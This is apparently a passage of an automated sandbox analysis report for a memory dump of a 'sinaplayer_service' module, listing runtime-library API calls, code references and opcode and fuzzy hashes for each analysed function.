                                                                                                                                                                                                    • Concurrency::details::HillClimbing::FlushHistories.LIBCMT ref: 6D0EE990
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Climbing::Concurrency::details::Hill$FlushHistoriesHistory
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2521976074-0
                                                                                                                                                                                                    • Opcode ID: 43cdbfb551b4512b9a60d19bfacad2fc48f39b9bf319a088c50dbc564a996bb2
                                                                                                                                                                                                    • Instruction ID: adf50a5dc06fc580608907183fd6662919c3ceea019db2393c725468770e7e6d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43cdbfb551b4512b9a60d19bfacad2fc48f39b9bf319a088c50dbc564a996bb2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D551C270A04A0AEFDB099F24D0807E9F7FAFF49380F158659C89993255DF31A560CBD1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,00000000,00000000,?,?,?,6D0E9F50,?,?,?,?,00000000,00000000), ref: 6D0EAB46
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,00000000,00000000,?,?,?,6D0E9F50,?,?,?,?,00000000,00000000), ref: 6D0EAB66
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0EAC8A
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0EAC93
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                    • Opcode ID: 18214f1ebb69e61ce8dd15747d9ea3c5218b36c8b23233d7e3175f5c03915d63
                                                                                                                                                                                                    • Instruction ID: ecb53959c14f722e6de035e5fbe4bd9acc6abeefad67eb3cbd72ea5d2368ac2c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18214f1ebb69e61ce8dd15747d9ea3c5218b36c8b23233d7e3175f5c03915d63
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 645139B5A04A0AAFDB04CF69C481AA9F7F1FF48314F24826ED81997741D735E961CF90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _CRT_RTC_INITW.MSVCR120(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6D0A15A6
                                                                                                                                                                                                    • free.MSVCR120(00006A69), ref: 6D0A1A0D
                                                                                                                                                                                                    • free.MSVCR120(?,00006A69), ref: 6D0A1A4A
                                                                                                                                                                                                    • free.MSVCR120(?,?,00006A69), ref: 6D0A1A55
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,00000000,00000000,00000000), ref: 6D0DF99E
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6D0DF9B7
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,00000000,00000000,00000000), ref: 6D0DF9D0
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6D0DF9D9
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6D0DF9EB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                    • Opcode ID: b8d2094d9414943216563375d5cd92b930092c5a16a3dffa84d36599bba4a353
                                                                                                                                                                                                    • Instruction ID: d23a74232c6a9ce9b570ce2fa5600663ebb55f8dc6e8c5c98d5a14fdbcd311aa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8d2094d9414943216563375d5cd92b930092c5a16a3dffa84d36599bba4a353
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD4149316582869FEB028F78D8817E57FF4EF57325B1C42EAD495DA027D6318842CB52
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::AdjustAllocationIncrease.LIBCMT ref: 6D0F0296
                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::AddCore.LIBCMT ref: 6D0F0372
                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCMT ref: 6D0F0388
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::SendResourceNotifications.LIBCMT ref: 6D0F03C7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::$Proxy::Scheduler$Resource$AdjustAllocationBorrowedCoreIncreaseManager::NotificationsSendStateToggle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 772867930-0
                                                                                                                                                                                                    • Opcode ID: de3868945a6524268160681985767abd92d420b5dde3f85a6753c6faea0fef0f
                                                                                                                                                                                                    • Instruction ID: f1cb751367605d12faba7b381f1e72b1401088b3453b307059d9caec998c3910
                                                                                                                                                                                                    • Opcode Fuzzy Hash: de3868945a6524268160681985767abd92d420b5dde3f85a6753c6faea0fef0f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47518B75E0821ADFDB15CF99C490BAEBBF6BF89314F25405DC846A7341C731A942CBA0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                                                    • Opcode ID: ec8090c9f45b2dfe9fa0f7f5550e1db0235acb843716e8d043a3f298008b6455
                                                                                                                                                                                                    • Instruction ID: 325b1e5ec54b8ad852de007cc645a9dcf1d9f44955274b8b545c5b9b70ec8788
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec8090c9f45b2dfe9fa0f7f5550e1db0235acb843716e8d043a3f298008b6455
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A431F2706086029BFF11CE2AA5C0BBE63D5AF82269B318529DD72976A1C720F887C751
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 94262dd74edc80c97018a71458ed4918a6e90a4189257a76bc30c67d3cfc84a0
                                                                                                                                                                                                    • Instruction ID: b0b53722dffe545285d5d1bce65e5383af3972303b1eb46a5eb52cebf3507f45
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94262dd74edc80c97018a71458ed4918a6e90a4189257a76bc30c67d3cfc84a0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8941A6712083028FE725CF29C980B17B7E1BF89325F54466EE6568B6D1D730E945CB92
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: aadbb5bfedd7f15821d5643dda10b260edcc284b2a70cdb102f0477fa0197533
                                                                                                                                                                                                    • Instruction ID: 652a118c67e83f98a8d17615c4a237a858b661d40081efc99abfa191818f0658
                                                                                                                                                                                                    • Opcode Fuzzy Hash: aadbb5bfedd7f15821d5643dda10b260edcc284b2a70cdb102f0477fa0197533
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D41E270A04706DFEB29CF68C981B6AB3F1FF49320F54826ED2169B281D731E941CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0EA811
                                                                                                                                                                                                    • memset.MSVCR120(00000000,00000000,00000000,00000000), ref: 6D0EA826
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000000C,00000000,00000000,00000000,00000000), ref: 6D0EA82D
                                                                                                                                                                                                    • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR120 ref: 6D0EA8A3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Spin$??2@Concurrency@@Once@?$_Wait@$00@details@memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3776030036-0
                                                                                                                                                                                                    • Opcode ID: 53df2e3abb0c90eaa42c37cf78143c7b1719617a6dadb96ce027491df5f2a69c
                                                                                                                                                                                                    • Instruction ID: 42f59af6a22de987ca95e85c27a06f013f5573305aa0cfb5813cd58880238753
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53df2e3abb0c90eaa42c37cf78143c7b1719617a6dadb96ce027491df5f2a69c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD4183716083128FE719CF28C980B17B7F1FF89365F60866DE5968B290D730E846CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • __isctype_l.LIBCMT(00000000,00000001,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000004,00000000,00000000,00000000,00000004), ref: 6D0D7097
                                                                                                                                                                                                    • _isleadbyte_l.MSVCR120(?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000004,00000000,00000000,00000000,00000004,00000000), ref: 6D0D70D8
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,?,00000100,00000004,00000001,00000000,00000003,?,00000001,00000001,00000000,00000000,00000000,00000000,00000000,00000001), ref: 6D0D7128
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String__crt__isctype_l_getptd_isleadbyte_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4137432777-0
                                                                                                                                                                                                    • Opcode ID: fab5e595c3bcd69590cecc153e18bd09cef618834cf9b2e290d69a79d7d2e43a
                                                                                                                                                                                                    • Instruction ID: 3d77be538676efb8fd48ce3dc00eac97f324c9fb7d014623c32a84fd14f44010
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fab5e595c3bcd69590cecc153e18bd09cef618834cf9b2e290d69a79d7d2e43a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C241D530D1835AAFEB02CBA8C851FBD7BB4AB42315F148299E1619F2D2D7368645CB51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6D0F7EC0
                                                                                                                                                                                                    • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCMT ref: 6D0F7F15
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6D0F7F50
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6D0F7F98
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000048,?), ref: 6D0F7FCC
                                                                                                                                                                                                      • Part of subcall function 6D094872: TlsGetValue.KERNEL32(?,6D0948CA,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D09488E
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E7484,6D15CEB0), ref: 6D0F7FE1
                                                                                                                                                                                                      • Part of subcall function 6D0992EB: RaiseException.KERNEL32(?,?,?,6D0AC7FC,?,?,?,?,?,6D0DDA6A,?,6D0AC7FC,?,00000001), ref: 6D099333
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,?,?,?,?,6D0E7484,6D15CEB0), ref: 6D0F8006
                                                                                                                                                                                                    • ?_Abort@_StructuredTaskCollection@details@Concurrency@@AAEXXZ.MSVCR120(00000048,?,6D15D0DC), ref: 6D0F8061
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6D0F8081
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000000,?,00000048,?,6D15D0DC), ref: 6D0F8091
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??0exception@std@@Base::CancellationConcurrency::details::ContextVisible$ExceptionTask$Abort@_Base::_CollectionCollection@details@Concurrency::details::_Concurrency@@H_prolog3_catchRaiseStateStructuredThrowTokenValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4223231496-0
                                                                                                                                                                                                    • Opcode ID: 42a55fd103f951a44263766c4264d0250db15269c63932d4029096c247c5cca3
                                                                                                                                                                                                    • Instruction ID: 64367a768949be279725eaf484da06a02ef0b9d78b36ed313b7ee73f1fb2ce67
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42a55fd103f951a44263766c4264d0250db15269c63932d4029096c247c5cca3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8416F70A046069FEB14CF6AC590BAEB7F4FF48314B20842DE95AA7711C734E906CF91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • _isleadbyte_l.MSVCR120(?,?), ref: 6D09EF4B
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,6D0D5D30,00000001,00000000,00000000), ref: 6D09EF73
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,6D0D5D30,00000001,00000000,00000000), ref: 6D0D6F4D
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D6F6D
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$_errno_getptd_isleadbyte_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3831352077-0
                                                                                                                                                                                                    • Opcode ID: 1279a2b1953b942b18518c26257a542775d78795c4e8fb9658060248086e90b0
                                                                                                                                                                                                    • Instruction ID: 3af1aebb3a997fba3cdbebbeed00709fb647c802fdf1ed54a1db492f9005002f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1279a2b1953b942b18518c26257a542775d78795c4e8fb9658060248086e90b0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E831A031A0575AABFB118E76C844BBE7BF9BF45310F45812AE865CB091E731D890DB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0AA6D5: DName::operator+.LIBCMT ref: 6D0AA74B
                                                                                                                                                                                                    • DName::operator+.LIBCMT ref: 6D0A3647
                                                                                                                                                                                                    • DName::operator+.LIBCMT ref: 6D0A364E
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Name::operator+
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2943138195-0
                                                                                                                                                                                                    • Opcode ID: c334d7cfd62cab175373601adfd5448784cfa1cd0d6100bd3848485ce6a3e285
                                                                                                                                                                                                    • Instruction ID: 1933db8062f7f749129935b7a6ee18a9537e5e8d0be56cae778232af55697722
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c334d7cfd62cab175373601adfd5448784cfa1cd0d6100bd3848485ce6a3e285
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5231A1716447059FDB00DFE8C851BAAB7F8AF59708B18846EE699C7382E7749840CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _towlower_l.MSVCR120(?,?,?), ref: 6D09F61A
                                                                                                                                                                                                      • Part of subcall function 6D091CD0: iswctype.MSVCR120(?,00000001,?,?,?,?,?), ref: 6D091D12
                                                                                                                                                                                                    • _towlower_l.MSVCR120(?,?,?,?,?), ref: 6D09F62A
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0DACCC
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0DACD7
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _towlower_l$_errno_getptd_invalid_parameter_noinfoiswctype
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1468503887-0
                                                                                                                                                                                                    • Opcode ID: 64deebebafb4b5d855bd85bef538c794e5a2feae737fe78107102acee94fd170
                                                                                                                                                                                                    • Instruction ID: 8b8880489ca676bc2f44f5a0703b5922dd07a772a9c3ec022b4adf03d105c801
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64deebebafb4b5d855bd85bef538c794e5a2feae737fe78107102acee94fd170
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08213576A0032B9BFB10DFA898807BB77E8BB00B11F950116F864AF191D7308D91E7A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock.MSVCR120(00000001,6D0958A0,00000010,6D09639E,6D0963D0,00000008), ref: 6D09586C
                                                                                                                                                                                                      • Part of subcall function 6D08EDD7: EnterCriticalSection.KERNEL32(?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D08EDF3
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000038,6D0958A0,00000010,6D09639E,6D0963D0,00000008), ref: 6D0D5A37
                                                                                                                                                                                                    • __crtInitializeCriticalSectionEx.MSVCR120(6D15DFE0,00000FA0,00000000,6D0958A0,00000010,6D09639E,6D0963D0,00000008), ref: 6D0D5A61
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6D15DFE0), ref: 6D0D5A75
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Enter$Initialize__crt_lock_malloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1908659308-0
                                                                                                                                                                                                    • Opcode ID: 1d0b0e01bac9c06e37d9e94106a1956b2a845bb63f4feafea87879825d537d83
                                                                                                                                                                                                    • Instruction ID: f26d7c6f7cc8bef0e4013e290053b5e69e4e47ae6d94a9e1634d9c84a7e9abff
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d0b0e01bac9c06e37d9e94106a1956b2a845bb63f4feafea87879825d537d83
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8131BE75908302DFE7108FAAD488B3A77F0FF09320B96516DE4759B291CB74E4809F41
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0A3F83
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,00000004,6D0A3C4A,?,00000001), ref: 6D0A4013
                                                                                                                                                                                                    • memset.MSVCR120(00000000,00000000,?,00000004,6D0A3C4A,?,00000001), ref: 6D0A402B
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000010), ref: 6D0A4044
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog3memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 747782440-0
                                                                                                                                                                                                    • Opcode ID: 6be67d86e6748749a95df6fb42cec2fa989c0dab7aacf28b80c65cb5e1b31a7b
                                                                                                                                                                                                    • Instruction ID: 80a3f5e0f7c551baa15f4bd3def8f5273e30c7e1c85617906685d4ded32772bf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6be67d86e6748749a95df6fb42cec2fa989c0dab7aacf28b80c65cb5e1b31a7b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1931D0B0901B409FD724CF2A8541656FBF8BF98310B108A1FD2EACBAA0CBB0A505DF10
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • _towlower_l.MSVCR120(?,?), ref: 6D091DBB
                                                                                                                                                                                                      • Part of subcall function 6D091CD0: iswctype.MSVCR120(?,00000001,?,?,?,?,?), ref: 6D091D12
                                                                                                                                                                                                    • _towlower_l.MSVCR120(00000000,?,?,?), ref: 6D091DCE
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D0DABFA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?), ref: 6D0DAC05
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _towlower_l$_errno_getptd_invalid_parameter_noinfoiswctype
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1468503887-0
                                                                                                                                                                                                    • Opcode ID: 38a39bd1a0b66247343e370a84c995297be80ab28bcbabd15c118810698fdc25
                                                                                                                                                                                                    • Instruction ID: 53969786823035e1fb25fdea9a8db3ee8db26b00f70ecf26845f4918a4fa689e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38a39bd1a0b66247343e370a84c995297be80ab28bcbabd15c118810698fdc25
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30214B36F042625AFB24DED9D8407FA73E9EB11611FC6411AE9A04F1C5E7358D42E3A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000001,00000000,00000001,00000002,?,00000000,?), ref: 6D0B2F3A
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(?,00000000), ref: 6D0B2F40
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 6D0B2F47
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 6D0B2F4A
                                                                                                                                                                                                      • Part of subcall function 6D094DF1: _get_osfhandle.MSVCR120(?,?,?,?,6D094F10,?,6D094F30,00000010), ref: 6D094DFA
                                                                                                                                                                                                      • Part of subcall function 6D094DF1: _get_osfhandle.MSVCR120(?), ref: 6D094E1D
                                                                                                                                                                                                      • Part of subcall function 6D094DF1: CloseHandle.KERNEL32(00000000), ref: 6D094E24
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D0DF075
                                                                                                                                                                                                    • __doserrno.MSVCR120(?), ref: 6D0DF080
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _get_osfhandle$CurrentHandleProcess$CloseDuplicate__doserrno_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4219055303-0
                                                                                                                                                                                                    • Opcode ID: af77ad93212bf51b6d194f7a6f2b10eb4c95aa19b83a760e90c0058ed4781c6d
                                                                                                                                                                                                    • Instruction ID: 65e1142035a793980d022e24922d5f1ec3ad1fedf187de9df7f0a440fc3f0f1f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: af77ad93212bf51b6d194f7a6f2b10eb4c95aa19b83a760e90c0058ed4781c6d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F31F771908295BBEF119F28E9C4BA97FF5DF0A314F198199E9548F252C770D941CB40
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000004,00000000,?,005C2D90,?,6D0B3036,005C2D90,00000000,?,005C2A20), ref: 6D0B2FF8
                                                                                                                                                                                                    • _wcsdup.MSVCR120(00000000,00000000,?,005C2D90,?,6D0B3036,005C2D90,00000000,?,005C2A20), ref: 6D0B3014
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _calloc_crt_wcsdup
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1800982338-0
                                                                                                                                                                                                    • Opcode ID: 6be68950c333f0118358c88a8cdf137a2006a4341983aba9b6d5a7b1c4908cee
                                                                                                                                                                                                    • Instruction ID: dcedd3e5e5544b03cdfbe96c6903803184d9e1169a2d1452585c021d0554e280
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6be68950c333f0118358c88a8cdf137a2006a4341983aba9b6d5a7b1c4908cee
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC11D0B2B0C2179BFB208A6DED00B76B7E8DF457A5B25423EED58D7140EB72D8418790
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • _tolower_l.MSVCR120(00000000,00000000,?,?,?,?), ref: 6D0AE370
                                                                                                                                                                                                    • _tolower_l.MSVCR120(00000000,00000000,00000000,00000000,?,?,?,?), ref: 6D0AE37F
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?), ref: 6D0B2AB7
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?), ref: 6D0DAB87
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _tolower_l$_errno_getptd_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3234443108-0
                                                                                                                                                                                                    • Opcode ID: ed9bf525f1c48ced1e15b51d219a628de9eaefb9c13ec554bb3020071ed2572a
                                                                                                                                                                                                    • Instruction ID: c768777f3bd61c65eb67d08c6cc8f04771d4a47dbd7ed40bff780381711237ed
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed9bf525f1c48ced1e15b51d219a628de9eaefb9c13ec554bb3020071ed2572a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36113D32A04256BFFB21CEB8DC48BFE77A4FB55254F150258E830971C2D7759840C7A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(000001F0,00000000,?,?,00000000,?,6D0F3F86,00000000,00000001), ref: 6D0B3DD2
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000000,?,6D0F3F86,00000000,00000001), ref: 6D0B3DF2
                                                                                                                                                                                                    • InterlockedPushEntrySList.KERNEL32(000001F0,?,?,00000000,?,6D0F3F86,00000000,00000001), ref: 6D0B3E0A
                                                                                                                                                                                                    • TlsSetValue.KERNEL32(?,?,6D15CFF4,00000000,00000000), ref: 6D0D30E3
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: List$CloseDepthEntryHandleInterlockedPushQueryValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 94243546-0
                                                                                                                                                                                                    • Opcode ID: 3a13e617c9f508fcf4ee62a81009cd14d25d7c832a1838dab903f704837977b4
